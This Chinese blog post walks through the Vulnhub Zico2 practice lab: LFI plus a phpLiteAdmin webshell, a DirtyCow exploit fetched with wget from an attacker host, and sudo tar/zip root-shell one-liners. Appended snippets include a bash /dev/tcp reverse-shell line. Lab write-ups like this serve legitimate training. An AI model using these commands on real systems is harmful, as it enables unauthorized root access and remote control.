Vulnhub 渗透练习(九)——Zico

最新推荐文章于 2025-02-16 20:29:06 发布
最新推荐文章于 2025-02-16 20:29:06 发布
阅读量481 收藏
点赞数
分类专栏: 渗透学习 文章标签: 渗透学习 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shinygod/article/details/129141011
版权
文章描述了一次渗透测试的过程,包括环境准备、信息收集、发现并利用1.9.3版本PHP远程代码执行漏洞,通过文件读取进行命令执行。接着,利用脏牛漏洞提升权限,再通过tar和zip命令进行提权,最终恢复并保持root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建

环境下载

靶机用 vtrtualbox 打开,攻击机随意,其他网络配置和前几个靶机一样。

信息收集在这里插入图片描述

三个端口。
在这里插入图片描述
没见过 111 端口,看下是什么服务,rpc 服务。

主要用于分布式系统中不同计算机的内部进程通信。

在这里插入图片描述
跑一下目录,顺便测一下网页。

这边能够文件读取。

在这里插入图片描述
在这里插入图片描述

跑出来的目录还不少。
在这里插入图片描述

漏洞挖掘

/dbadmin/test_db.php 尝试密码 admin 成功,且 1.9.3 版本是有远程php代码执行漏洞的,但是这个数据库的目录我们访问不了,但是我们可以通过上面那个文件读取漏洞,来包含它,这样不就可以执行命令了吗。
在这里插入图片描述

在这里插入图片描述

先创个数据库,然后创一个有 PHP 马的表。
在这里插入图片描述
成功命令执行,反弹个 shell。
在这里插入图片描述
给它 url 编码一下。

在这里插入图片描述
在这里插入图片描述
反弹成功。

在这里插入图片描述

脏牛提权

先用 python 开个简单的交互 shell。

在这里插入图片描述

test_user 中有两个账密,尝试 ssh 登录失败。
在这里插入图片描述

root:34kroot34
zico:zico2215@

查一下 suid
在这里插入图片描述
切换不了用户,直接漏洞探针探一波,具体怎么探,看一下我的渗透练习(七),把探针传到 /usr/databases 目录下,给执行权限,执行。

chmod +x linux-exploit-suggester.sh

在这里插入图片描述
利用脏牛提权,上传脚本,编译并执行。

wget http://192.168.56.102/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 12345

要等好一会。
在这里插入图片描述
成功添加 root 权限用户 firefart
在这里插入图片描述

root 成功。
在这里插入图片描述
拿到 flag。
在这里插入图片描述

其他提权

在 wordpress 的配置文件中有 zico 的账密。

zico
sWfCsfJSPV9H3AmQzw8

在这里插入图片描述
成功切换为 zico。
在这里插入图片描述
在这里插入图片描述

sudo -l 时候,说没有 root 用户,那是因为脏牛提权的时候,root 用户变成了 firefart 用户,我们只需要把脏牛提权的时候生成的 passwd 备份文件覆盖当前的 /etc/passwd 就行了。
在这里插入图片描述
先切换成 firefart 用户,执行 mv /tmp/passwd.bak /etc/passwd 命令后,root 用户就恢复了。

在这里插入图片描述
这次 sudo -l 成功,可以看到两个 root 权限的命令,tar 和 zip。

在这里插入图片描述

tar 提权

sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

在这里插入图片描述

zip 提权T

直接利用 zico 目录下的 to_do.txt 压缩提权。

sudo -u root zip to_do.zip to_do.txt -T --unzip-command="sh -c /bin/bash"

在这里插入图片描述

总结

文件包含+数据库文件写马	getshell
脏牛提权后恢复 root 用户(切换为 firefart 用户执行 mv /tmp/passwd.bak /etc/passwd)
tar 和 zip 提权
sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo -u root zip to_do.zip to_do.txt -T --unzip-command="sh -c /bin/bash"
【漏洞复现】CVE-2016-5195 DirtyCow 脏牛提权
李火火的安全圈
03-10 8763
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
vulnhub - zico2(考点: LFI & phpliteadmin & tar/zip 提权 & 版本提权)
冬萍子癸水
04-26 595
https://www.vulnhub.com/entry/zico2-1,210/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很常规,22想到可能的ssh登录,80是进web搜集信息 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-...
Vulnhub实战:zico2
qq_24033605的博客
08-12 313
描述: 收集信息: 靶机开放了三个端口,ssh,http,rpc。 先进入80端口进行查看。 发现个文件包含漏洞。 尝试读取passwd文件 成功读取后,进行目录扫描。 找到了几个目录,看着dbadmin像是后台数据库,查看一下 尝试了几个弱密码,是admin 查看数据库发现两个用户信息,一个是root,一个是zico,md5爆破密码。 尝试ssh登录,发现密码不对,返回去找了个phpliteadmin的漏洞。 按照上述步骤,创建数据库,创建表,将一句话木马写入。 成功写入,
Linux脏牛漏洞提权复现
wangyuxiang946的博客
07-22 2万+
操作系统: Linux ( CentOS 6.5)Web服务: PHP+Apache
linux系统漏洞firefart,记:从文件上传漏洞到获得root权限
weixin_33511258的博客
05-16 928
提权过程试了好几种方法。使用反向连接得到webshell,得到内核版本等信息#公网服务器使用nc监听nc -lvvp 1234#目标机器上执行命令bash -i >& /dev/tcp/公网服务器IP/端口 0>&1[www@centos]$ whoamiwww[www@centos]$ uname -auname -aLinux centos 2.6.32-431.e...
生命在于学习——Linux提权
易水哲的博客
11-03 1796
Linux提权的学习笔记记录。
渗透测试实战5——zico2靶机入侵
浅浅的博客
04-25 1536
一、实验环境 攻击机(Kali):192.168.247.156 靶机(Node):192.168.247.154 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 目标靶机开放22、80、111、50309端口 3、服务版本信息 (二)端口探测 80端口 1、目录探测 分别使用默认字典和大字典对靶机进行目录探测,探测结果如下: 2、访问...
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 7204
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
靶机渗透——Zico
1匹黑马
02-21 790
文章目录任务环境信息收集漏洞挖掘漏洞利用获得权限权限提升 任务环境 攻击机:Kali2019 靶机:zico 涉及知识点:目录遍历、文件包含、数据库插马拿shell、脏牛提权 信息收集 获取靶机的IP地址以及端口服务信息 开放了22、80、111端口,接着扫一下Web目录 这里发现了一个类似于数据库管理的页面,这里就是我们的切入点了。 漏洞挖掘 先用owasp-zap扫一下 这里...
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 661
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
oscp备考,oscp系列——zico2靶场:phpLiteAdmin v1.9.3弱口令+远程代码执行,sudo-zar提权
最新发布
2202_75361164的博客
02-16 515
oscp备考,oscp系列——zico2靶场:phpLiteAdmin v1.9.3弱口令+远程代码执行,sudo-zar提权难度简单对于低权限shell获取涉及:phpLiteAdmin v1.9.3弱口令+远程代码执行对于提权:通过信息收集在wordpress配置文件找到zico用户密码,sudo-zar提权。
脏牛内核漏洞提权(CVE-2016-5195)
不曾扬帆,何以至远方
07-05 3263
脏牛漏洞、CVE-2016-5195
linux系统漏洞firefart,CVE-2016-5159 利用脏牛漏洞Linux提权复现
weixin_33766046的博客
05-16 316
////This exploit uses the pokemon exploit of the dirtycow vulnerability//as a base and automatically generates a new passwd line.//The user will be prompted for the new password when the binary is run...
脏牛提权(cve-2016-5159)
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...
linux系统漏洞firefart,CVE-2016-5195脏牛Linux提权复现
weixin_39726873的博客
05-16 1162
漏洞编号:CVE-2016-5195影响范围: Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复)漏洞影响:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权。0x01 环境搭建使用Metasploitable作为模拟服务器环境下载压缩包解压,导入虚拟机即可。下载exp:0x02 漏洞利用通过dvwa上传webshell,用蚁剑上传脏牛ex...
安全漏洞--linux 最新内核通用提权漏洞利用示例 (脏牛Dirty COW)
热门推荐
关注互联网安全的小虾米一枚
10-21 2万+
0x01 简介 Linux内核在处理内存写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致提权漏洞。 CVE-2016-5195: https://access.redhat.com/security/cve/CVE-2016-5195 0x02 漏洞
linux利用脏牛提权
a1262443306的博客
04-18 1304
Linux利用脏牛漏洞提权: 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow) ​ 本主机:kali ip: 192.168.223.129 ​ 目标机:ubuntu ip:192.168.223.128 ​ 提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接 打开虚拟终端: 2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7920
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
vulnhub渗透系列之zico2(内含zip提权和脏牛提权)
来到了学渣的博客
02-02 2287
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
Zico2靶机渗透测试实战指南
Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机提供了丰富的环境来模拟真实世界的网络安全挑战。为了开始这个渗透实战,我们需要准备一个测试机(如Kali Linux 2020...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值